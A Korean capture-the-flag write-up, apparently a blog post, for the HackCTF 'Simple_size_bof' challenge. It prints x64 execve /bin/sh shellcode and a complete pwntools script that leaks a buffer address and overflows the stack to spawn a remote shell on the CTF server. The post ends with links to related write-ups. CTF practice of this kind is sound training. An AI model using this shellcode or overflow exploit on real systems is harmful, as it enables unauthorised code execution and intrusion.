1. 보호기법 확인
계속 ex가 안 되서 뭐가 문제인가 했더니 쉘코드를 기존에 사용하던 것과 다른 것을 사용해야 한다고 한다..
"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
이 쉘코드를 사용하니까 제대로 쉘이 따졌다.
2. exploit code
#!/usr/bin/python
from pwn import *
context.log_level = 'debug'
#p = process("./Simple_size_bof")
p = remote("ctf.j0n9hyun.xyz", 3005)
p.recvuntil("buf: ")
buf = int(p.recv(14), 16)
log.info("buf : "+hex(buf))
shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
pay = '\x90'*100
pay += shellcode
pay += '\x90'*(0x6d30-len(pay))
pay += 'A'*0x8
pay += p64(buf)
p.sendlineafter("\n", pay)
p.interactive()
3. exploit
[HackCTF] offset (0) | 2020.01.01 |
---|---|
[HackCTF] Simple_Overflow_ver_2 (0) | 2020.01.01 |
[HackCTF] x64 Buffer Overflow (0) | 2020.01.01 |
[HackCTF] 내 버퍼가 흘러넘친다!!! (0) | 2020.01.01 |
[HackCTF] Basic_FSB (0) | 2020.01.01 |